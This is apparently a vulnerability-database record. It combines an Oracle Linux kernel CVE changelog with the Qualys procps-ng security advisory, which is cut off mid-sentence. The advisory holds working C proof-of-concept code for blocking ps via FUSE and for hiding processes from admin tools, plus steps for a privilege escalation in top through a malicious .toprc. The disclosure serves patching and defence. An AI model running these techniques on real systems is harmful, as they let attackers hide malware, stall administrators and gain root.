sctp: fix src address selection if using secondary addresses for ipv6 (Xin Long) [1445919]\n- [net] sctp: deny peeloff operation on asocs with threads sleeping on it (Hangbin Liu) [1470559]\n- [net] sctp: avoid BUG_ON on sctp_wait_for_sndbuf (Hangbin Liu) [1470559]\n- [net] tcp: fix race during timewait sk creation (Florian Westphal) [1205025]\n[2.6.32-733]\n- [fs] sunrpc: Revert 'sunrpc: always treat the invalid cache as unexpired' (Thiago Becker) [1532786]\n- [net] dma: fix memory leak in dma_pin_iocvec_pages (Sabrina Dubroca) [1459263]\n- [s390] qeth: check not more than 16 SBALEs on the completion queue (Hendrik Brueckner) [1520860]\n- [s390] fix transactional execution control register handling (Hendrik Brueckner) [1520862]\n- [mm] prevent concurrent unmap_mapping_range() on the same inode (Miklos Szeredi) [1408108]\n[2.6.32-732]\n- [mm] add cpu_relax() to 'dont return 0 too early' patch (Ian Kent) [988988]\n- [mm] dont return 0 too early from find_get_pages() (Ian Kent) [988988]\n- [crypto] cryptd: Add cryptd_max_cpu_qlen module parameter (Jon Maxwell) [1503322]\n- [s390] cpcmd,vmcp: avoid GFP_DMA allocations (Hendrik Brueckner) [1496105]\n- [fs] gfs2: Withdraw for IO errors writing to the journal or statfs (Robert S Peterson) [1505956]\n- [netdrv] ixgbe: Fix incorrect bitwise operations of PTP Rx timestamp flags (Ken Cox) [1523856]\n[2.6.32-731]\n- [kernel] fix __wait_on_atomic_t() to call the action func if the counter != 0 (David Howells) [1418631]\n- [fs] fscache: fix dead object requeue (David Howells) [1333592 1418631]\n- [fs] fscache: clear outstanding writes when disabling a cookie (David Howells) [1418631]\n- [fs] fscache: initialise stores_lock in netfs cookie (David Howells) [1418631]\n- [fs] cachefiles: fix attempt to read i_blocks after deleting file (David Howells) [1418631]\n- [fs] cachefiles: fix race between inactivating and culling a cache object (David Howells) [1418631]\n- [fs] fscache: make check_consistency callback return int (David Howells) [1418631]\n- [fs] fscache: wake write waiter after invalidating writes (David Howells) [1418631]\n- [fs] cachefiles: provide read-and-reset release counters for cachefilesd (David Howells) [1418631]\n- [s390] disassembler: increase show_code buffer size (Hendrik Brueckner) [1516654]\n- [fs] sunrpc: remove BUG_ONs checking RPC_IS_QUEUED (Dave Wysochanski) [1424630]\n- [fs] nfsv4.1: nfs4_fl_prepare_ds must be careful about reporting success (Scott Mayhew) [1205448]\n- [fs] cifs: add ratelimit for the log entry that causes a lockup (Leif Sahlberg) [1494999]\n- [fs] nfsd: check for oversized NFSv2/v3 arguments (J. Bruce Fields) [1447168]\n[2.6.32-730]\n- [scsi] avoid a permanent stop of the scsi devices request queue (Ewan Milne) [1513455]\n- [fs] bio: more bio_map_user_iov() leak fixes (Ming Lei) [1503590] {CVE-2017-12190}\n- [fs] bio: fix unbalanced page refcounting in bio_map_user_iov (Ming Lei) [1503590] {CVE-2017-12190}\n[2.6.32-729]\n- [scsi] bnx2fc: Fix hung task messages when a cleanup response is not received during abort (Chad Dupuis) [1504260]\n[2.6.32-728]\n- [mm] introduce dedicated WQ_MEM_RECLAIM workqueue to do lru_add_drain_all (Waiman Long) [1463754]\n- [netdrv] cxgb4: Clear On FLASH config file after a FW upgrade (Arjun Vynipadath) [1446952]\n- [netdrv] chelsio : Fixes the issue seen on initiator while stopping the target (Sai Vemuri) [1442097]\n- [netdrv] be2net: Fix UE detection logic for BE3 (Ivan Vecera) [1437991]\n- [netdrv] cxgb4vf: dont offload Rx checksums for IPv6 fragments (Davide Caratti) [1427036]\n- [scsi] qla2xxx: Get mutex lock before checking optrom_state (Himanshu Madhani) [1408549]\n[2.6.32-727]\n- [net] sctp: do not loose window information if in rwnd_over (Marcelo Leitner) [1492220]\n- [net] sctp: fix recovering from 0 win with small data chunks (Marcelo Leitner) [1492220]\n[2.6.32-726]\n- [s390] qdio: clear DSCI prior to scanning multiple input queues (Hendrik Brueckner) [1467962]\n[2.6.32-725]\n- [s390] zfcp: fix erp_action use-before-initialize in REC action trace (Hendrik Brueckner) [1497000]\n- [ipmi] create hardware-independent softdep for ipmi_devintf (Tony Camuso) [1457915]\n[2.6.32-724]\n- [fs] nfsd: reorder nfsd_cache_match to check more powerful discriminators first (Thiago Becker) [1435787]\n- [fs] nfsd: split DRC global spinlock into per-bucket locks (Thiago Becker) [1435787]\n- [fs] nfsd: convert num_drc_entries to an atomic_t (Thiago Becker) [1435787]\n- [fs] nfsd: remove the cache_hash list (Thiago Becker) [1435787]\n- [fs] nfsd: convert the lru list into a per-bucket thing (Thiago Becker) [1435787]\n- [fs] nfsd: clean up drc cache in preparation for global spinlock elimination (Thiago Becker) [1435787]\n[2.6.32-723]\n- [hv] vmbus: Fix error code returned by vmbus_post_msg() (Vitaly Kuznetsov) [1491846]\n- [hv] vmbus: Increase the time between retries in vmbus_post_msg() (Vitaly Kuznetsov) [1491846]\n- [hv] vmbus: Raise retry/wait limits in vmbus_post_msg() (Vitaly Kuznetsov) [1491846]\n- [hv] vmbus: Reduce the delay between retries in vmbus_post_msg() (Vitaly Kuznetsov) [1491846]\n[2.6.32-722]\n- [scsi] be2iscsi: fix bad extern declaration (Maurizio Lombardi) [1497152]\n- [kernel] mqueue: fix a use-after-free in sys_mq_notify() (Davide Caratti) [1476124] {CVE-2017-11176}\n[2.6.32-721]\n- [char] ipmi: use rcu lock around call to intf->handlers->sender() (Tony Camuso) [1466034]\n- [net] packet: fix tp_reserve race in packet_set_ring (Stefano Brivio) [1481943] {CVE-2017-1000111}\n- [net] packet: fix overflow in check for tp_frame_nr (Stefano Brivio) [1484946] {CVE-2017-7308}\n- [net] packet: fix overflow in check for tp_reserve (Stefano Brivio) [1484946] {CVE-2017-7308}\n- [fs] binfmt_elf.c:load_elf_binary(): return -EINVAL on zero-length mappings (Petr Matousek) [1492961] {CVE-2017-1000253}\n- [fs] binfmt_elf.c: fix bug in loading of PIE binaries (Petr Matousek) [1492961] {CVE-2017-1000253}\n[2.6.32-720]\n- [net] tcp: initialize rcv_mss to TCP_MIN_MSS instead of 0 (Davide Caratti) [1488340] {CVE-2017-14106}\n- [net] tcp: fix 0 divide in __tcp_select_window() (Davide Caratti) [1488340] {CVE-2017-14106}\n- [net] ipv6: accept 64k - 1 packet length in ip6_find_1stfragopt() (Matteo Croce) [1477006] {CVE-2017-7542}\n- [net] ipv6: avoid overflow of offset in ip6_find_1stfragopt (Matteo Croce) [1477006] {CVE-2017-7542}\n- [net] udp: consistently apply ufo or fragmentation (Davide Caratti) [1481529] {CVE-2017-1000112}\n- [net] ipv6: Should use consistent conditional judgement for ip6 fragment between __ip6_append_data and ip6_finish_output (Davide Caratti) [1481529] {CVE-2017-1000112}\n- [net] ipv4: Should use consistent conditional judgement for ip fragment in __ip_append_data and ip_finish_output (Davide Caratti) [1481529] {CVE-2017-1000112}\n[2.6.32-719]\n- [fs] nfs: dont disconnect open-owner on NFS4ERR_BAD_SEQID (Dave Wysochanski) [1459636]\n- [net] l2cap: prevent stack overflow on incoming bluetooth packet (Neil Horman) [1490062] {CVE-2017-1000251}\n[2.6.32-718]\n- [fs] sunrpc: always treat the invalid cache as unexpired (Thiago Becker) [1477288]\n- [fs] sunrpc: xpt_auth_cache should be ignored when expired (Thiago Becker) [1477288]\n[2.6.32-717]\n- [video] efifb: allow user to disable write combined mapping (Dave Airlie) [1465097]\n[2.6.32-716]\n- [netdrv] sfc: tx ring can only have 2048 entries for all EF10 NICs (Jarod Wilson) [1441773]\n- [netdrv] brcmfmac: fix possible buffer overflow in brcmf_cfg80211_mgmt_tx() (Stanislaw Gruszka) [1474782] {CVE-2017-7541}\n- [scsi] lpfc: fix 'integer constant too large' error on 32bit archs (Maurizio Lombardi) [1441169]\n- [scsi] lpfc: version 11.0.1.6 is 11.0.0.6 with no_hba_reset patches (Maurizio Lombardi) [1441169]\n- [scsi] lpfc: Vport creation is failing with 'Link Down' error (Maurizio Lombardi) [1441169]\n- [scsi] lpfc: Fix panic on BFS configuration (Maurizio Lombardi) [1441169]\n- [scsi] lpfc: Fix eh_deadline setting for sli3 adapters (Maurizio Lombardi) [1441169]\n- [scsi] lpfc: Correct panics with eh_timeout and eh_deadline (Maurizio Lombardi) [1441169]\n[2.6.32-715]\n- [x86] fix /proc/mtrr with base/size more than 44bits (Jerome Marchand) [1466530]\n[2.6.32-714]\n- [fs] gfs2: clear gl_object when deleting an inode in gfs2_delete_inode (Robert S Peterson) [1464541]\n- [fs] gfs2: clear gl_object if gfs2_create_inode fails (Robert S Peterson) [1464541]\n- [fs] gfs2: set gl_object in inode lookup only after block type check (Robert S Peterson) [1464541]\n- [fs] gfs2: introduce helpers for setting and clearing gl_object (Robert S Peterson) [1464541]\n[2.6.32-713]\n- [net] ipv6: Fix leak in ipv6_gso_segment() (Sabrina Dubroca) [1459951] {CVE-2017-9074}\n- [net] gre: fix a possible skb leak (Sabrina Dubroca) [1459951] {CVE-2017-9074}\n- [net] ipv6: xfrm: Handle errors reported by xfrm6_find_1stfragopt() (Sabrina Dubroca) [1459951] {CVE-2017-9074}\n- [net] ipv6: Check ip6_find_1stfragopt() return value properly (Sabrina Dubroca) [1459951] {CVE-2017-9074}\n- [net] ipv6: Prevent overrun when parsing v6 header options (Sabrina Dubroca) [1459951] {CVE-2017-9074}\n[2.6.32-712]\n- [mm] backport upstream large stack guard patch to RHEL6 (Larry Woodman) [1464237 1452730] {CVE-2017-1000364}\n- [mm] revert 'enlarge stack guard gap' (Larry Woodman) [1452730] {CVE-2017-1000364}\n- [mm] revert 'allow JVM to implement its own stack guard pages' (Larry Woodman) [1464237]\n[2.6.32-711]\n- [fs] sunrpc: Handle EADDRNOTAVAIL on connection failures (Dave Wysochanski) [1459978]\n- [scsi] Add STARGET_CREATED_REMOVE state to scsi_target_state (Ewan Milne) [1452358]\n[2.6.32-710]\n- [mm] allow JVM to implement its own stack guard pages (Larry Woodman) [1464237]\n- [mm] enlarge stack guard gap (Larry Woodman) [1452730] {CVE-2017-1000364}\n[2.6.32-709]\n- [netdrv] bnxt_en: Update to firmware interface spec 1.5.1 (Jonathan Toppins) [1439450]\n- [netdrv] bnxt_en: Added support for Secure Firmware Update (Jonathan Toppins) [1439450]\n- [netdrv] bnxt_en: Add support for firmware updates for additional processors (Jonathan Toppins) [1439450]\n- [netdrv] bnxt_en: Update firmware spec. to 1.3.0 (Jonathan Toppins) [1439450]\n- [netdrv] bnxt_en: Add support for updating flash more securely (Jonathan Toppins) [1439450]\n- [netdrv] bnxt_en: Request firmware reset after successful firwmare update (Jonathan Toppins) [1439450]\n- [netdrv] bnxt_en: Add hwrm_send_message_silent() (Jonathan Toppins) [1439450]\n- [netdrv] bnxt_en: Add installed-package firmware version reporting via Ethtool GDRVINFO (Jonathan Toppins) [1439450]\n- [netdrv] bnxt_en: Reset embedded processor after applying firmware upgrade (Jonathan Toppins) [1439450]\n- [netdrv] bnxt_en: Add support for upgrading APE/NC-SI firmware via Ethtool FLASHDEV (Jonathan Toppins) [1439450]\n- [net] sctp: do not inherit ipv6_(mc|ac|fl)_list from parent (Florian Westphal) [1455612] {CVE-2017-9075}\n- [net] ipv6/dccp: do not inherit ipv6_mc_list from parent (Florian Westphal) [1455612] {CVE-2017-9076 CVE-2017-9077}\n- [net] dccp/tcp: do not inherit mc_list from parent (Florian Westphal) [1455612] {CVE-2017-8890}\n- [net] ipv6: nullify ipv6_ac_list and ipv6_fl_list when creating new socket (Florian Westphal) [1455612]\n[2.6.32-708]\n- [fs] sunrpc: Enable the keepalive option for TCP sockets (Dave Wysochanski) [1458421]\n- [mm] mempolicy.c: fix error handling in set_mempolicy and mbind (Bruno E. O. Meneguele) [1443539] {CVE-2017-7616}\n- [s390] zfcp: fix use-after-'free' in FC ingress path after TMF (Hendrik Brueckner) [1421762]\n- [scsi] scsi_transport_srp: Fix a race condition (Don Dutile) [1417305]\n- [scsi] scsi_transport_srp: Introduce srp_wait_for_queuecommand() (Don Dutile) [1417305]\n- [block] make blk_cleanup_queue() wait until request_fn finished (Don Dutile) [1417305]\n[2.6.32-707]\n- [kernel] audit: acquire creds selectively to reduce atomic op overhead (Paul Moore) [1454847]\n- [s390] kernel: initial cr0 bits (Hendrik Brueckner) [1445326]\n- [s390] zfcp: do not trace pure benign residual HBA responses at default level (Hendrik Brueckner) [1421760]\n- [s390] zfcp: fix rport unblock race with LUN recovery (Hendrik Brueckner) [1421761]\n[2.6.32-706]\n- [netdrv] ixgbe: fix setup_fc for x550em (Ken Cox) [1442030]\n- [scsi] bnx2fc: fix race condition in bnx2fc_get_host_stats() (Maurizio Lombardi) [1393672]\n[2.6.32-705]\n- [fs] nfsd: stricter decoding of write-like NFSv2/v3 ops (J. Bruce Fields) [1446755] {CVE-2017-7895}\n- [fs] nfsd4: minor NFSv2/v3 write decoding cleanup (J. Bruce Fields) [1446755] {CVE-2017-7895}\n- [perf] fix concurrent sys_perf_event_open() vs move_group race (Jiri Olsa) [1434751] {CVE-2017-6001}\n- [perf] remove confusing comment and move put_ctx() (Jiri Olsa) [1434751] {CVE-2017-6001}\n- [perf] restructure perf syscall point of no return (Jiri Olsa) [1434751] {CVE-2017-6001}\n- [perf] fix move_group() order (Jiri Olsa) [1434751] {CVE-2017-6001}\n- [perf] generalize event->group_flags (Jiri Olsa) [1434751] {CVE-2017-6001}\n- [scsi] libfc: quarantine timed out xids (Chris Leech) [1431440]\n[2.6.32-704]\n- [fs] sunrpc: Ensure that we wait for connections to complete before retrying (Dave Wysochanski) [1448170]\n- [net] ipv6: check raw payload size correctly in ioctl (Jamie Bainbridge) [1441909]\n[2.6.32-703]\n- [fs] nfsv4: fix getacl ERANGE for some ACL buffer sizes (J. Bruce Fields) [869942]\n- [fs] nfsv4: fix getacl head length estimation (J. Bruce Fields) [869942]\n[2.6.32-702]\n- [fs] xfs: handle array index overrun in xfs_dir2_leaf_readbuf() (Carlos Maiolino) [1440361]\n- [net] ping: implement proper locking (Jakub Sitnicki) [1438999] {CVE-2017-2671}\n- [net] tcp: avoid infinite loop in tcp_splice_read() (Davide Caratti) [1430578] {CVE-2017-6214}\n- [net] ipv6: ip6_fragment: fix headroom tests and skb leak (Hannes Frederic Sowa) [1412331]\n[2.6.32-701]\n- [x86] vmalloc_sync: avoid syncing vmalloc area on crashing cpu (Pingfan Liu) [1146727]\n- [kernel] audit: plug cred memory leak in audit_filter_rules (Richard Guy Briggs) [1434560]\n[2.6.32-700]\n- [mm] hugetlb: check for pte NULL pointer in page_check_address() (Herton R. Krzesinski) [1431508]\n- [netdrv] be2net: Fix endian issue in logical link config command (Ivan Vecera) [1436527]\n- [crypto] mpi: Fix NULL ptr dereference in mpi_powm() (Mateusz Guzik) [1398456] {CVE-2016-8650}\n- [fs] aio: properly check iovec sizes (Mateusz Guzik) [1337517] {CVE-2015-8830}\n- [fs] vfs: make AIO use the proper rw_verify_area() area helpers (Mateusz Guzik) [1337535] {CVE-2012-6701}\n[2.6.32-699]\n- [scsi] lpfc: update for r 11.0.0.6 (Maurizio Lombardi) [1429881]\n- [scsi] lpfc: The lpfc driver does not issue RFF_ID and RFT_ID in the correct sequence (Maurizio Lombardi) [1429881]\n[2.6.32-698]\n- [sched] fair: Rework throttle_count sync (Jiri Olsa) [1250762]\n- [sched] fair: Reorder cgroup creation code (Jiri Olsa) [1250762]\n- [sched] fair: Initialize throttle_count for new task-groups lazily (Jiri Olsa) [1250762]\n- [sched] fair: Do not announce throttled next buddy in dequeue_task_fair() (Jiri Olsa) [1250762]\n[2.6.32-697]\n- [block] fix use-after-free in seq file (Denys Vlasenko) [1418549] {CVE-2016-7910}\n- [firmware] Replacing the chelsio firmware (t4,t5)fw-1.15.37.0 (Sai Vemuri) [1425749]\n- [kernel] genirq: Avoid taking sparse_irq_lock for non-existent irqs (Dave Wysochanski) [1360930]\n- [tty] n_hdlc: get rid of racy n_hdlc.tbuf (Herton R. Krzesinski) [1429918] {CVE-2017-2636}", "edition": 71, "modified": "2018-06-25T00:00:00", "published": "2018-06-25T00:00:00", "id": "ELSA-2018-1854", "href": "http://linux.oracle.com/errata/ELSA-2018-1854.html", "title": "kernel security and bug fix update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-05-31T01:51:38", "description": "Exploit for linux platform in category local exploits", "edition": 1, "published": "2018-05-30T00:00:00", "title": "Procps-ng - Multiple Vulnerabilities", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-1121", "CVE-2018-1124", "CVE-2018-1120", "CVE-2018-1123", "CVE-2018-1122"], "modified": "2018-05-30T00:00:00", "id": "1337DAY-ID-30505", "href": "https://0day.today/exploit/description/30505", "sourceData": "Procps-ng Audit Report\r\n \r\n \r\n========================================================================\r\nContents\r\n========================================================================\r\n \r\nSummary\r\n1. FUSE-backed /proc/PID/cmdline\r\n2. Unprivileged process hiding\r\n3. Local Privilege Escalation in top (Low Impact)\r\n4. Denial of Service in ps\r\n5. Local Privilege Escalation in libprocps (High Impact)\r\n 5.1. Vulnerability\r\n 5.2. Exploitation\r\n 5.3. Exploitation details\r\n 5.4. Non-PIE exploitation\r\n 5.5. PIE exploitation\r\nAcknowledgments\r\nPatches.tar.gz.b64\r\n \r\n \r\n========================================================================\r\nSummary\r\n========================================================================\r\n \r\nWe performed a complete audit of procps-ng, the \"command line and full\r\nscreen utilities for browsing procfs, a 'pseudo' file system dynamically\r\ngenerated by the [Linux] kernel to provide information about the status\r\nof entries in its process table\" (https://gitlab.com/procps-ng/procps).\r\nprocps-ng contains the utilities free, kill, pgrep, pidof, pkill, pmap,\r\nps, pwdx, skill, slabtop, snice, sysctl, tload, top, uptime, vmstat, w,\r\nwatch, and the necessary libprocps library.\r\n \r\nWe discovered and submitted patches for more than a hundred bugs and\r\nvulnerabilities in procps-ng; for reference, our patches are available\r\nat:\r\n \r\nhttps://www.qualys.com/2018/05/17/procps-ng-audit-report-patches.tar.gz\r\n \r\nand base64-encoded at the end of this advisory. In the remainder of this\r\nadvisory, we present our most interesting findings:\r\n \r\n1. FUSE-backed /proc/PID/cmdline (CVE-2018-1120)\r\n \r\n An attacker can block any read() access to /proc/PID/cmdline by\r\n mmap()ing a FUSE file (Filesystem in Userspace) onto this process's\r\n command-line arguments. The attacker can therefore block pgrep, pidof,\r\n pkill, ps, and w, either forever (a denial of service), or for some\r\n controlled time (a synchronization tool for exploiting other\r\n vulnerabilities).\r\n \r\n2. Unprivileged process hiding (CVE-2018-1121)\r\n \r\n An unprivileged attacker can hide a process from procps-ng's\r\n utilities, by exploiting either a denial of service (a rather noisy\r\n method) or a race condition inherent in reading /proc/PID entries (a\r\n stealthier method).\r\n \r\n3. Local Privilege Escalation in top (CVE-2018-1122)\r\n \r\n top reads its configuration file from the current working directory,\r\n without any security check, if the HOME environment variable is unset\r\n or empty. In this very unlikely scenario, an attacker can carry out an\r\n LPE (Local Privilege Escalation) if an administrator executes top in\r\n /tmp (for example), by exploiting one of several vulnerabilities in\r\n top's config_file() function.\r\n \r\n4. Denial of Service in ps (CVE-2018-1123)\r\n \r\n An attacker can overflow the output buffer of ps, when executed by\r\n another user, administrator, or script: a denial of service only (not\r\n an LPE), because ps mmap()s its output buffer and mprotect()s its last\r\n page with PROT_NONE (an effective guard page).\r\n \r\n5. Local Privilege Escalation in libprocps (CVE-2018-1124)\r\n \r\n An attacker can exploit an integer overflow in libprocps's\r\n file2strvec() function and carry out an LPE when another user,\r\n administrator, or script executes a vulnerable utility (pgrep, pidof,\r\n pkill, and w are vulnerable by default; other utilities are vulnerable\r\n if executed with non-default options). Moreover, an attacker's process\r\n running inside a container can trigger this vulnerability in a utility\r\n running outside the container: the attacker can exploit this userland\r\n vulnerability and break out of the container or chroot. We will\r\n publish our proof-of-concept exploits in the near future.\r\n \r\nAdditionally, CVE-2018-1125 has been assigned to\r\n0008-pgrep-Prevent-a-potential-stack-based-buffer-overflo.patch, and\r\nCVE-2018-1126 to 0035-proc-alloc.-Use-size_t-not-unsigned-int.patch.\r\n \r\n \r\n========================================================================\r\n1. FUSE-backed /proc/PID/cmdline (CVE-2018-1120)\r\n========================================================================\r\n \r\nIn this experiment, we add a sleep(60) to hello_read() in\r\nhttps://github.com/libfuse/libfuse/blob/master/example/hello.c and\r\ncompile it, mount it on /tmp/fuse, and mmap() /tmp/fuse/hello onto the\r\ncommand-line arguments of a simple proof-of-concept:\r\n \r\n$ gcc -Wall hello.c `pkg-config fuse --cflags --libs` -o hello\r\n$ mkdir /tmp/fuse\r\n$ ./hello /tmp/fuse\r\n \r\n$ cat > fuse-backed-cmdline.c << \"EOF\"\r\n#include <fcntl.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <sys/mman.h>\r\n#include <sys/stat.h>\r\n#include <sys/types.h>\r\n#include <unistd.h>\r\n \r\n#define die() do { \\\r\n fprintf(stderr, \"died in %s: %u\\n\", __func__, __LINE__); \\\r\n exit(EXIT_FAILURE); \\\r\n} while (0)\r\n \r\n#define PAGESZ ((size_t)4096)\r\n \r\nint\r\nmain(const int argc, const char * const argv[])\r\n{\r\n if (argc <= 0) die();\r\n const char * const arg_start = argv[0];\r\n const char * const last_arg = argv[argc-1];\r\n const char * const arg_end = last_arg + strlen(last_arg) + 1;\r\n \r\n if (arg_end <= arg_start) die();\r\n const size_t len = arg_end - arg_start;\r\n if (len < 2 * PAGESZ) die();\r\n \r\n char * const addr = (char *)(((size_t)arg_start + PAGESZ-1) & ~(PAGESZ-1));\r\n if (addr < arg_start) die();\r\n if (addr + PAGESZ > arg_end) die();\r\n \r\n const int fd = open(\"/tmp/fuse/hello\", O_RDONLY);\r\n if (fd <= -1) die();\r\n if (mmap(addr, PAGESZ, PROT_READ, MAP_PRIVATE | MAP_FIXED, fd, 0) != addr) die();\r\n if (close(fd)) die();\r\n \r\n for (; {\r\n sleep(1);\r\n }\r\n die();\r\n}\r\nEOF\r\n$ gcc -Wall fuse-backed-cmdline.c -o fuse-backed-cmdline\r\n$ ./fuse-backed-cmdline `perl -e 'print \"A\" x 8192'`\r\n \r\nThen, if root executes ps (for example):\r\n \r\n# time ps ax\r\n PID TTY STAT TIME COMMAND\r\n...\r\nreal 1m0.021s\r\nuser 0m0.003s\r\nsys 0m0.017s\r\n \r\n \r\n========================================================================\r\n2. Unprivileged process hiding (CVE-2018-1121)\r\n========================================================================\r\n \r\nSeveral procps-ng utilities (pgrep, pidof, pkill, ps, w) read the\r\n/proc/PID/cmdline of every process running on the system; hence, an\r\nunprivileged attacker can hide a process (albeit noisily) by exploiting\r\na denial of service in procps-ng (for example, the FUSE-backed denial of\r\nservice, or one of the integer overflows in file2strvec()).\r\n \r\nAlternatively, we devised a stealthier method for hiding a process:\r\n \r\n1/ fork() our process until it occupies the last PID\r\n(/proc/sys/kernel/pid_max - 1) or one of the last PIDs;\r\n \r\n2/ monitor (with inotify) the /proc directory and the /proc/PID/stat\r\nfile of one of the very first PIDs, for IN_OPEN events (opendir() and\r\nopen());\r\n \r\n3/ when these events occur (when a procps-ng utility starts scanning\r\n/proc for /proc/PID entries), fork() our process until its PID wraps\r\naround and occupies one of the very first PIDs;\r\n \r\n4/ monitor (with inotify) the /proc directory for an IN_CLOSE_NOWRITE\r\nevent (closedir());\r\n \r\n5/ when this event occurs (when the procps-ng utility stops scanning\r\n/proc), go back to 1/.\r\n \r\nThis simple method works, because the kernel's proc_pid_readdir()\r\nfunction returns the /proc/PID entries in ascending numerical order.\r\nMoreover, this race condition can be made deterministic by using a\r\nFUSE-backed /proc/PID/cmdline as a synchronization tool.\r\n \r\n$ cat > unprivileged-process-hiding.c << \"EOF\"\r\n#include <errno.h>\r\n#include <limits.h>\r\n#include <signal.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <sys/inotify.h>\r\n#include <sys/stat.h>\r\n#include <sys/types.h>\r\n#include <sys/wait.h>\r\n#include <unistd.h>\r\n \r\n#define die() do { \\\r\n fprintf(stderr, \"died in %s: %u\\n\", __func__, __LINE__); \\\r\n exit(EXIT_FAILURE); \\\r\n} while (0)\r\n \r\nint\r\nmain(void)\r\n{\r\n for (; {\r\n char lost[64];\r\n {\r\n const pid_t hi = getpid();\r\n pid_t lo = fork();\r\n if (lo <= -1) die();\r\n if (!lo) { /* child */\r\n lo = getpid();\r\n if (lo < hi) exit(EXIT_SUCCESS); /* parent continues */\r\n for (; {\r\n if (kill(hi, 0) != -1) continue;\r\n if (errno != ESRCH) die();\r\n break;\r\n }\r\n continue;\r\n }\r\n /* parent */\r\n if (lo > hi) exit(EXIT_FAILURE); /* child continues */\r\n int status = 0;\r\n if (waitpid(lo, &status, 0) != lo) die();\r\n if (!WIFEXITED(status)) die();\r\n if (WEXITSTATUS(status) != EXIT_SUCCESS) die();\r\n \r\n printf(\"%d -> %d -> \", hi, lo);\r\n for (; {\r\n struct stat st;\r\n if (--lo <= 0) die();\r\n snprintf(lost, sizeof(lost), \"/proc/%d/stat\", lo);\r\n if (stat(lost, &st) == 0) break;\r\n }\r\n printf(\"%d\\n\", lo);\r\n }\r\n \r\n const int pofd = inotify_init();\r\n if (pofd <= -1) die();\r\n if (inotify_add_watch(pofd, \"/proc\", IN_OPEN) <= -1) die();\r\n \r\n const int lofd = inotify_init();\r\n if (lofd <= -1) die();\r\n if (inotify_add_watch(lofd, lost, IN_OPEN) <= -1) die();\r\n \r\n const int pcfd = inotify_init();\r\n if (pcfd <= -1) die();\r\n if (inotify_add_watch(pcfd, \"/proc\", IN_CLOSE_NOWRITE) <= -1) die();\r\n \r\n char buf[sizeof(struct inotify_event) + NAME_MAX + 1];\r\n const struct inotify_event * const evp = (void *)buf;\r\n \r\n for (; {\r\n if (read(pofd, buf, sizeof(buf)) < (ssize_t)sizeof(*evp)) die();\r\n if (evp->mask & IN_ISDIR) break;\r\n }\r\n \r\n if (read(lofd, buf, sizeof(buf)) < (ssize_t)sizeof(*evp)) die();\r\n for (; {\r\n const pid_t hi = getpid();\r\n pid_t lo = fork();\r\n if (lo <= -1) die();\r\n if (lo) exit(EXIT_SUCCESS); /* parent */\r\n /* child */\r\n lo = getpid();\r\n if (lo < hi) {\r\n printf(\"%d -> %d\\n\", hi, lo);\r\n break;\r\n }\r\n }\r\n \r\n for (; {\r\n if (read(pcfd, buf, sizeof(buf)) < (ssize_t)sizeof(*evp)) die();\r\n if (evp->mask & IN_ISDIR) break;\r\n }\r\n \r\n if (close(pofd)) die();\r\n if (close(lofd)) die();\r\n if (close(pcfd)) die();\r\n }\r\n die();\r\n}\r\nEOF\r\n$ gcc -Wall unprivileged-process-hiding.c -o unprivileged-process-hiding\r\n$ ./unprivileged-process-hiding\r\n \r\nThen, if root executes ps (for example):\r\n \r\n# ps ax | grep '[u]nprivileged-process-hiding' | wc\r\n 0 0 0\r\n \r\n \r\n========================================================================\r\n3. Local Privilege Escalation in top (CVE-2018-1122)\r\n========================================================================\r\n \r\nIf a/ an administrator executes top in a directory writable by an\r\nattacker and b/ the HOME environment variable is unset or empty, then\r\ntop reads its configuration file from the current working directory,\r\nwithout any security check:\r\n \r\n3829 static void configs_read (void) {\r\n....\r\n3847 p_home = getenv(\"HOME\");\r\n3848 if (!p_home || p_home[0] == '\\0')\r\n3849 p_home = \".\";\r\n3850 snprintf(Rc_name, sizeof(Rc_name), \"%s/.%src\", p_home, Myname);\r\n3851 \r\n3852 if (!(fp = fopen(Rc_name, \"r\"))) {\r\n....\r\n3865 if (fp) {\r\n3866 p = config_file(fp, Rc_name, &tmp_delay);\r\n \r\nAlthough b/ is very unlikely, we developed a simple command-line method\r\nfor exploiting one of the vulnerabilities in config_file(), when top is\r\nnot a PIE (Position-Independent Executable). For example, on Ubuntu\r\n16.04.4:\r\n \r\n$ file /usr/bin/top\r\n/usr/bin/top: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=e64fe2c89ff07ca4ce5d169078586d2854628a29, stripped\r\n \r\nFirst, we dump a clean configuration file to /tmp/.toprc, by running top\r\nand pressing the 'W' key:\r\n \r\n$ cd /tmp\r\n$ env -u HOME top\r\nW\r\nq\r\n \r\nSecond, we add an arbitrary \"inspect\" command to this configuration file\r\n(inspect commands are normally executed when the user presses the 'Y'\r\nkey):\r\n \r\n$ echo -e 'pipe\\tname\\tid>>/tmp/top.%d.%lx' >> .toprc\r\n \r\nTo execute our inspect command without user interaction, we will emulate\r\nthe 'Y' key by jumping directly into inspection_utility(), at 0x40a989\r\n(the fflush(stdout) is INSP_BUSY's last instruction):\r\n \r\n3442 static void inspection_utility (int pid) {\r\n....\r\n3496 case kbd_ENTER:\r\n3497 INSP_BUSY;\r\n3498 Insp_sel = &Inspect.tab[sel];\r\n3499 Inspect.tab[sel].func(Inspect.tab[sel].fmts, pid);\r\n \r\n 40a97d: 48 8b 3d 1c f8 20 00 mov 0x20f81c(%rip),%rdi # 61a1a0 <stdout>\r\n 40a984: e8 67 7f ff ff callq 4028f0 <[email\u00a0protected]>\r\n 40a989: 48 63 05 2c f9 20 00 movslq 0x20f92c(%rip),%rax # 61a2bc\r\n 40a990: 8b 74 24 74 mov 0x74(%rsp),%esi\r\n 40a994: 48 c1 e0 06 shl $0x6,%rax\r\n 40a998: 48 03 05 61 11 23 00 add 0x231161(%rip),%rax # 63bb00\r\n 40a99f: 48 89 05 12 11 23 00 mov %rax,0x231112(%rip) # 63bab8\r\n 40a9a6: 48 8b 78 18 mov 0x18(%rax),%rdi\r\n 40a9aa: ff 10 callq *(%rax)\r\n 40a9ac: 5b pop %rbx\r\n \r\nTo jump directly into inspection_utility(), we will take control of\r\ntop's execution flow, by exploiting a vulnerability in config_file().\r\n\"sortindx\" is read from the configuration file without any 